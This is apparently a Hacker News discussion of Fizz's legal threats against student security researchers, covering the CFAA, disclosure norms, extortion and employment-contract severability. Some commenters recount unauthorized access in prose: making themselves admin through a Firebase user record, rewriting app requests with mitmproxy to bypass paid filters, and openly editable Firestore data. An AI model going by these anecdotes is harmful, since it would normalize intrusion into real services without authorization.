I disagree with this take. There are certainly lines of what is and is not ethical behaviour (where they are is highly debatable), but the vendor doesn't have a monopoly on deciding that.
Yes i disagree. You are quoting the document out of context and it doesn't say what you are implying it says.
Maybe out of context is the wrong word. You quote enough of the paragraph it just doesn't support your point.
All the paragraph says is that one hypothetical situation may have legal consequences in some juridsictions. It does not make any claim as to whether or not that is ethical or right.
Ok, do you agree that they claimed the OWASP document supported their actions?
Concerned about user privacy and security — and consistent with industry best practices [link to owasp] — we wrote a detailed email to the Fizz team [0]
Do you disagree that the OWASP page states the below?
Researchers should:
Ensure that any testing is legal and authorised.[1]
Ok, I can see how the OWASP document doesn’t use the words ethic or right or wrong. Would you agree that the claim by saligrama.io that they were “consistent with best practices” (where best practices is a link to OWASP) is not true?
I can see an interpretation where they communicated in line with best practices even if they didn’t follow best practices in their actions before communicating.
I don't think you have the pattern of facts correct (unless you have access to more information than what is in linked the Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
I think intent matters for actually securing an indictment and conviction, if for example they can prove that you exfiled their user data (this happened to Weev who noticed an ordinal ID in a URL and enumerated all possible URLs) they could actually get the feds to bust you. But you're right, if they're big enough they could try to come after your regardless at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, then someone hacks it, I think by definition your are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you by definition, are allowed to.
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why in both contracts and legal communication (particularly threatening one), there is little to no consequence for the writing party to get things right.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
"Right-to-Work" refers to the inability of unions to negotiate closed shops, where all employees of that "shop" must be part of the union.
You're thinking of "At-Will" employment, which allows employees and employers to end an employment relationship at any time for any (except for the few illegal) reasons.
Right-to-work is about quashing union shops. You're thinking about "at-will" employment, which is the law of the land everywhere except Montana. But an employee contract overrides at-will employment: If your contract says your employer can't fire you, your employer can't fire you without being in breach of contract.
The employment of an individual that has an employment contract is governed by the strictest set of rules between the right-to-work state's laws and the employment contract. Literally every permissible provision of an employment contract can be a protection: golden parachutes, vacation days, sick days, payout of the same, IP guarantees for hobby work, employment benefits, etc.
Right to work at its most generic level means freedom from being forced into a union, not freedom from being held to a contract.
Nobody has these except top execs who are already in a huge position of power.
> vacation days, sick days, payout of the same
Nope, not anymore: nothing is guaranteed with "flexible time off". I literally cannot meet my performance goal if I take more than 1 day of sick/vacation day PER YEAR. Yes, my raises are tied to this performance goal. Yes, it's probably illegal, but who cares? Nobody is ever going to do anything about it. This is every company with FTO. Who gets "paid out" for PTO anymore?
> IP guarantees for hobby work
You're joking, right? Most employment contracts claim that they own the slam poetry you write on your napkin at 2:00 am on a Saturday while high on your couch. Every mention of IP in an employment contract is as greedy as possible.
> employment benefits
Ok but in a right to work state these can be terminated any time anyway.
Literally nothing about an employment contract is ever written in favor of the actual employee. Of course it's not: they wrote it. If every company in an industry does this and they all refuse to negotiate, workers have no choice but to sign it. It's crazy to me to think that a U.S. company would voluntarily ever do anything in the interest of any of its employees, ever. This is the whole reason why ambiguities are supposed to go in favor of the party that didn't write it. Voiding any part of an employee contract can therefore only ever benefit the employee (except possibly the part where they get paid). If you want protections for employees, look to regulation and unions, not contracts written by the employer.
I don’t know what to say in response to your complaints except negotiate better working conditions next time you get hired. The company wrote it. You accepted it. You can always ask for different terms and walk away if they don’t agree, start your own company, or change industries to one where companies are willing to negotiate.
If you want protections for employees, sure you can (erroneously, in my opinion) look to unions. If you want protections for yourself, look to negotiate.
> You can always ask for different terms and walk away if they don’t agree, start your own company, or change industries to one where companies are willing to negotiate.
I suspect you have lived a very privileged life if you really believe these options are actually open to most employees in the U.S. Switch industries? Start your own company? Those are both extreme life-altering multi-year responses to losing PTO payout, and only work for people who have major safety nets and support in their lives. Companies pull this bullshit because they know they can get away with it. Guess what: they're right. I'm glad you are in such a state of privilege that you can spend 4 years going back to college and switching industries without going into massive debt and without suffering from the loss of income during that time, but you are extremely lucky to be in that position. Do not assume others are lazy and/or stupid and/or bad negotiators because they can't. Negotiating is not about shaking hands harder, it's about having leverage, and 98% of U.S. workers have none.
> negotiate better working conditions next time you get hired
These were not the working conditions at the time I was hired. None of this was in any contract I signed. Companies change this stuff after-the-fact all the time. What are you going to do, hire an employment lawyer? You'd poison your own drinking well, potentially forever, with the possible upside of being the only employee in your company that actually get PTO paid out? Come on. Nobody is doing this. Companies pull this bullshit because they can.
I grew up what you’d call “lower middle class.” Your suspicions are incorrect. I’ve switched industries twice in my life to the tune of nearly a third a million in student loan debt. I know how difficult it is and how expensive it is, but the actual strength of some people’s personal convictions matches the strength of the convictions you pretend to have online. Just like you, the companies I worked at (and owned a portion of) changed or the industries I worked in changed, but unlike you I left (and forced them to cash out my PTO because, contrary to what you think, you do have an enforceable employment contract even if it’s in the form of a benefits package, an employee handbook, or even just “that’s what the company normally does” at that point in time) after realizing that the change was permanent rather than taking to the internet to complain while continuing to pull an easy paycheck.
It’s strange that the people who tell you how difficult something is are almost always people who haven’t done it and the people who tell you how privileged you are almost always are even more so themselves. Tell me, when’s the last time you swung a hammer or pulled unemployment benefits?
> I’ve switched industries twice in my life to the tune of nearly a third a million in student loan debt.
And you're actually suggesting this as a solution to others? That they lose years of income and take on $300k in non-dischargeable debt because their employer acted like a dick, in the vain hope that with this new degree, their new employers won't? Sorry, but "just spend years and take on $300k in student loan debt like I did" is just not compelling advice.
> the actual strength of some people’s personal convictions matches the strength of the convictions you pretend to have online
You're significantly upping the "personal attack" game here. You could just as easily say that I am the one with strong convictions, continuing to work at a company that treats its employees like shit because I actually do believe in the work that I'm doing there.
> It’s strange that the people who tell you how difficult something is are almost always people who haven’t done it
It's strange to you that the people who claim something is difficult are the ones who haven't been able to do it?
> Tell me, when’s the last time you swung a hammer or pulled unemployment benefits?
Not interested in a hard-knocks pissing contest. I assumed you wouldn't spend $300k in a game of Musical Diplomas in the hope of avoiding being treated the way most people in the U.S. are treated by most companies unless you had a significant safety net. I'm not sure what you're trying to prove by saying: no, you added it onto an already difficult life. My point is that this is not good advice.
1. Someone asked what protections an employee could expect to receive from an employment contract in a right to work state.
2. I responded that right to work is not related to employment contracts but to unions and listed a number of protections and benefits regularly covered by employment contracts.
3. You came in saying that, anecdotally, the benefits are either non-existent in your industry or only available to top executives and ending with a sort of anti-“corporate overlord” conspiracy about how every term in an employment contract is a negative to an employee because the employer writes the contract.
4. I told you that contracts are bilateral and therefore you should negotiate, start your own business, or quit.
5. You responded with the first actual personal attack by stating that even suggesting that someone negotiate, start a business, or quit meant that I came from a life of luxury and privilege and how my supposed privilege blinds me to the cost of quitting an industry before again going on an rant based on your specific situation (that you refuse to leave) and generalizing your refusal to negotiate, start your own business, or leave to “nobody” negotiating, starting their own company, or leaving.
6. I responded to your personal attack by noting that I don’t come from privilege, that I have changed industries, that it is possible to finance it via student loans, and that I have been in similar situations as you and taken a different path. I noted that some people’s actions match their espoused beliefs while noting that you don’t appear to be one of those peoples. I then made a snarky comment about how you seem to be the type to deem something hard before even trying it and to cry privilege while you stay at your cushy white collar job.
7. You responded shifting your argument from “nobody” does this to “nobody smart” (obviously, because you’re smart and you haven’t done it) does this (a strange argument on a website like HN given its relationship with startups…) and crying about personal attacks. Oh, and apparently you really love your job after all despite all the prior ranting about how much you hate your job. And apparently you don’t want to get into a who-has-privilege argument with me after all now that you know my background sort of undercuts your entire argument.
I will concede that "I suspect you have lived a very privileged life" was overly focused on you, and should have been something like "Nobody should seriously consider these options unless they are living a very privileged life". Your actual personal history is not relevant my argument at all and I shouldn't have brought it up. I maintain that most employees have basically zero leverage to negotiate their worker-hostile contracts, and that it is not a good idea to saddle yourself with $300k of non-dischargeable student loan debt in order to try to avoid a practice that is pervasive in the U.S.
> anti-“corporate overlord” conspiracy
It's not exactly done in secret. Would you call a feudal serf a conspiracy theorist if he was ranting about how the Dukes and Kings hold all the power? I'm lucky that I have more leverage than an Amazon warehouse employee but it's awfully hard to compare their working conditions to Jeff Bezos's situation and not call him a "corporate overlord".
> Oh, and apparently you really love your job after all despite all the prior ranting about how much you hate your job.
This is just getting boring. Yes, I both love and hate my job. So?
> "Nobody should seriously consider these options unless they are living a very privileged life".
> I maintain that most employees have basically zero leverage to negotiate their worker-hostile contracts
He's trying to tell you from direct personal experience - as are many others in this thread - that it is not as dire as you're committed to believing, and that it is absolutely possible to negotiate terms at a non-executive level.
To put it differently: the corporate overlords have successfully convinced you that you have no power.
You're on a forum for tech workers and tech entrepreneurs. Going "you're privileged, gotcha!" doesn't carry much water when it's true of literally the entire target demographic. You are right, we are lucky: our industry is in demand, so don't squander it by pretending you're up against insurmountable odds at the negotiating table. All you're doing by rolling over for your employer is weakening everybody else's negotiating position.
If my employer wants to change the terms of my employment, I absolutely would make sure I actually agreed to the changes before doing anything else. If I didn't I'd refuse to sign anything, and leave the employer with the choice to either A) fire me (under the terms of the old contract) B) leave me with the old agreement C) fire me under the new terms and get sued or D) come back with a better offer.
This is tech. There's no shortage of jobs for people with any experience whatsoever. That's leverage in not getting railed in your employment terms.
Because for all the bullshit I have to put up with, and all the things I hate about management, and all the things that could easily be better but for one asshole vice-president needing to cosplay Business Hero ... for all of that, the job is deeply interesting and I learn a ton every day. And virtually every other job on the market is mind-numbingly boring and pointless.
And because I like my immediate teammates a lot.
And because the issues I'm railing against are incredibly pervasive in most companies in the United States and probably beyond. Our capitalism has been completely taken over by a caste of parasitic leeches who enshittify everything they touch and I am under no illusion that any other job would be any different.
But I do also look for other jobs regularly. Finding a job that is both interesting (<1%) and not full of shithead management (<5%) is about 1 in 2,000.
Employment contracts can govern firing. You can have a contract that says can only be fired for cause and get one month of notice for other dismissals.
Actual employment contracts are rare in the US. I think because don't want legal hassle for most employees, but executives and other important employees have contracts.
Other countries have contracts for every employee. I assume they use a standard contract for most employees, and that the laws limit the scope.
An employment contract is intended to backstop everything you were promised or negotiated during the hiring process. It doesn't really matter if you're in a right-to-work state or not, an employment contract provides you with recourse if the terms are not upheld by your employer. In the case of a breach, that is something you can remedy in court. (Whether or not it is worthwhile to pursue that legal case depends entirely on the context)
* anything you negotiated during hiring like RSU or sign-on bonuses
* stating your salary, benefits, vacation is the basis for protecting you from theft of that compensation.
* IP ownership clauses can protect your independent, off the clock work
* work location, if you are hired remote and then threatened with termination due to new RTO policies
I am just pulling from the top of my head general examples.
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
Practical example: your employment agreement has a non-compete clause. If 3 years later non-competes are no longer allowed in employment contracts, you won’t want to be suddenly unemployed because your employment contract is no longer valid.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
Thanks for the explanation and the term "severability". I understand its point now and it makes sense to have it conceptually. I also didn't know about this part:
> so long as it's not fundamentally a change to the contract's terms
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes, subtle technicalities. But if one party is being intentionally or absurdly overreaching then yes, I believe there should be some proportional punishment.
Particularly if the writing party's intent is to scare out of inaction more than a core belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
I do like the idea theoretically as a deterrent against bad actors abusing the law to bully weaker parties - but the difficult part is in the details of implementation: how do you separate intent to abuse from incompetence?
Also confusing the mix here is who you are punishing when violations are found - is it the attorneys drafting the agreement? They're as likely to be unaffiliated with the company executing the contract as not, not everyone bothers with in-house counsel. Is it the company leadership forwarding the contract?
What's the scope of the punishment? An embargo on all new legal agreements for a period of time, or only with the parties to the bad contract? A requirement for change in legal representation? Now we get into overreach questions on the punishment side.
All of that to say I am guessing the reason something like this doesn't exist yet afaik is because it's a logistical nightmare to actually put into practice.
The closest I can think of to something that might work is like a credit score/rating for companies for "contract integrity" or something that goes down with negative rulings - but what 3rd party would own that? Even just the thought experiment spawns too many subqueries to resolve simply.
None of that contradicts the fact it's a good idea - just not sure if even possible to bring to life!
I'm reminded of the concept of a "tact filter", which is basically "do you alter what you say to avoid causing offense, or do you alter what you hear to avoid taking offense?"
The part the original essay leaves out is that optimal behavior depends on the scale and persistence of the relationship. In personal, 1:1, long-term relationships, you should apply outgoing tact filters because if you cause offense you've torched the relationship permanently and will suffer long-term consequences from it. But in public discourse, many-to-many, transactional relationships, it's better to apply incoming tact filters because there are so many people you interact with that invariably there will be someone who forgot to set their outgoing tact filter. (And in public discourse where you have longstanding relationships with your customers with serious negative consequences for pissing them off, you want to be very, very careful what you say. The entire field of PR is devoted to this.)
So anyone who spends a significant amount of time with the general public basically needs to develop a translation layer. "i hope you hang yourself" on an Internet forum becomes "somebody had a bad day and is letting off steam by trolling." "Your business is probably in violation of federal labor laws because you haven't displayed these $400 posters we're trying to sell you" becomes "Better download some PDFs off the Department of Labor for free" [1]. "We're calling from XYZ Collection Agency about your debt" or "This is the Deputy Sheriffs office. You have a warrant out for your arrest for failing to appear for jury duty" or "This is the IRS calling requesting you pay back taxes in the amount of $X over the phone" = ignore them and hang up because it's a scam. "Continued involvement in Russia's internal affairs will lead to nuclear consequences" = Putin is feeling insecure with his base and needs to rattle some sabers to maintain support. "You are in violation of several state and federal laws facing up to 20 years in prison" = they want something from me, lawyer up and make sure we're not in violation and then let's negotiate.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
"Legalese" can often be simplified, but concepts that are necessarily in law are often not widely known by lay people, and as such it's hard to avoid some terminology and reasoning that require a bit of legal training to understand.
But every subject and field has their own set of terminology. It's just like programming -- while we strive to make code easier to understand (eg. Python is better than assembler in this regard), there's still a necessary learning curve. Your question is almost like asking "why can't we just tell the computer what we want to do in plain English?"
Sometimes the legalese is actually comprehensible if you give it a bit of patience. Often though, programmers like to make (wrong) assumptions about how the words are to be interpreted though, and that's where most people trip up.
Without a common language with exact meaning for phrases that are accepted by both parties contracts would be impossible to enforce and become useless.
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case and racking up legal fees the whole time. apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
“[the security researchers] may be liable for fines, damages and each individual of the [security research] Group may be imprisoned… Criminal penalties under the CFAA can be up to 20 years depending on circumstances.”
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
No, you are talking about criminal law. What OP is talking about is severability, which exists so that if a judge determines Clause X violates the law, they can still (attempt) to enforce the rest of the contract if X can be easily remedied. I.e. The contract says no lunch breaks but CalOSHA regulations say 30 minutes required, the contractor can't violate the contract in its' entirety, they just take the breaks and amend the contract if the employer pushes it.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
"That's not the language they used. They simply admired your place of business and reflected on what a shame it would be if a negative event happened to it. How would you keep people from saying that? It's basically a statement of fact..."
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. Definitely not clearly false that there's no liability here. Probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
Yeah, when it comes to cyber-security, we put our national security at risk so companies can avoid being embarrassed. (See my rant in another comment.)
As much as I hate using regulation as a hammer to fix things, if we did make software companies legally required to a level of security, then vulnerability testing like this could be prosecuted similar to SEC or OSHA violations and would work quite nicely
Protecting white-hat hackers could be seen as a reduction in "regulation", since it permits the good guys to do good things. It allows people to do more, but some people will be not be legally shielded from embarrassment and accountability anymore.
In the current status quo, everyone except the good guys gets free reign: companies can stop legal scrutiny of their security, black-hats run wild and answer to no one, and the white-hats wring their hands "please sir, may I check for myself that the services I depend on are secure?" to which the companies respond "ha ha, no, but trust us, it's secure."
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford daily article has copies of the lawyer letters back and forth, they are intense - and we wouldn't be able to read them if the EFF didn't step up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
One interesting thing about the statute of limitations is “the discovery rule.”
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statutes of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
Also there are subtle questions around what discovery means here. Usually it is some sort of "could be discovered with reasonable effort". If I had proof of your wrongdoing in a letter sent to me, I am unlikely to get away with saying, "Oh, I didn't read the letter when I got it." If that proof was buried in a computer file with a million pages, I probably can reasonably say, "That was a needle in a haystack, and I didn't even know what to look for." For situations between those extremes, there will be case law that likely varies by state.
Huge arrow pointing to “varies by state” on all of this.
1030 (which is, of course, federal law) actually has a specific discovery/statute of limitations in the text of the statute, and so may not be affected by state discovery rule law.
It is common. But before you curse at Google here. This is VERY well documented. When you create a database the UI screams at you that it's in dev mode, that security has not been setup etc.... if you keep ignoring the database will eventually close itself down automatically.
Which is why I hate that people keep claiming that you don't need to know what you are doing nor employ anyone who knows what they are doing to setup infrastructure. You might be able to stand things up without knowing what you are doing, but you probably shouldn't be running it in production that way.
If I recall correctly, you can set your firebase rules such that a user can only read/write/delete certain collections based on conditions such as if
user.email == collection.email.
A few years ago I found that HelloTalk (a language learning pen-pal app) stored the actual GPS coordinates of users in a SQLite that you can find in your iOS backup. The maps in-app showed only a general location (pin disappeared at a certain zoom).
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
I'm not even suggesting it has to happen at a legal level, but perhaps at a professional level, I would think any lawyer writing baseless threatening letters to people should be subject to losing there license.
Perhaps they shouldn't. If we lived in a world where lawyers were more cautions about what they attached there name to out of concern for losing their license we would probably be better off. Less bullying by corporations with lots of money etc. No problems with demand letters for legitimate issues that are well supported by evidence though.
>If we lived in a world where lawyers were more cautions about what they attached there name to out of concern for losing their license we would probably be better off.
That's already the case. Lawyers can be disbarred for filing frivolous lawsuits.
I'm in favor of the work done by the security researchers, and the defense offered by the EFF. However, your first comment was such a surface level understanding, and I wanted to bring it back to reality.
The general form of such a "legal threat" (threat relating to the law) is perfectly reasonable, normal, and legal (as in, conforming to the law). It's a standard part of practicing law.
However, in this specific case, they do appear to have broken one professional rule, regarding the threat of criminal prosecution conditional on a civil demand.
Aside from that one professional rule, the Fizz/Buzz letter was probably perfectly technically accurate. Whether the DA would take up the case, I doubt, but that's up to their discretion/advice from the DoJ, not based on the legal code.
I think Fizz/Buzz were incredibly foolish to send such a letter, as the researchers were essentially good samaritans being punished for their good deed (probably only because customers don't like it when supposedly professional organizations are found to be in need of such basic good deeds from good samaritans, and Fizz/Buzz would rather punish the good samaritans instead of "suffering" the "embarrassment" of public knowledge).
You seem to have the facts of this case incorrect. They definitely broke the law by hacking this app without prior authorization. You may disagree with the law but I don’t understand how you made the leap to calling for the suspension of specific attorneys.
The role of a lawyer is to make persuasive arguments in their clients favor, and those arguments are supported by a wide spectrum in strength of evidence and legal opinion.
Completely baseless stuff can get lawyers disbarred, but many things are shades of gray. The way the CFAA is written, just about any security research on someone else's machine that doesn't include "we got permission in advance" often falls into this gray area.
The fact that the DOJ doesn't prosecute good-faith security research is DOJ policy, not actual law. The law as-written doesn't have a good-faith exemption.
We've banned this account for repeatedly breaking the site guidelines.
If you don't want to be banned, you're welcome to email hn@ycombinator.com and give us reason to believe that you'll follow the rules in the future. They're here: https://news.ycombinator.com/newsguidelines.html.
IANL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
Just pointing out the absurdity of it. I would much rather get punched in the face than serve 20 years in prison, but it is illegal to threaten the former, but perfectly fine to threaten the latter.
>I would much rather get punched in the face than serve 20 years in prison, but it is illegal to threaten the former, but perfectly fine to threaten the latter.
How about you don't do the action that makes you punishable with 20 years in prison?
On a more practical level, if someone is breaking into your house, should it be illegal to tell them to stop, on pain of you calling the police which presumably would cause them to be incarcerated?
> On a more practical level, if someone is breaking into your house, should it be illegal to tell them to stop, on pain of you calling the police which presumably would cause them to be incarcerated?
Not a lawyer, but there's a fine line between extortion and not-extortion.
It's not extortion when you're making the threat to either stop an illegal behavior or secure something you already have rights to. Like, "I'm calling the cops if you don't return the kids on the time/date we agreed on in the goddamn divorce papers" is not extortion, because you have a legitimate claim to defend.
It is extortion when you're trying to use the threat of law enforcement as a means of engineering consent or coercing someone into doing something. Like, "I'm going to call the cops and tell them about your shoplifting unless you send me nudes/pay me $500/keep your mouth shut." You can't leverage withheld knowledge of a crime as a means of controlling someone. Otherwise it opens the door to "Remember that time you raped me? You need to do me another favor to make it right"-type of arrangements.
The first example would be extortion if the kids were returned late but it was not reported, and the other party continued threatening to report it after the fact to enforce future compliance.
"It would be legitimate" is just an assertion. The entire debate is about what is legitimate and what is not. You're supposed to be saying why things are or are not legitimate, either legally or morally.
Sure, but if I shoot someone in self defense, there will be an investigation and I have to show why I thought it was legitimate. If a lawyer writes a baseless threatening letter, at the very least I should be able to have the bar association investigate.
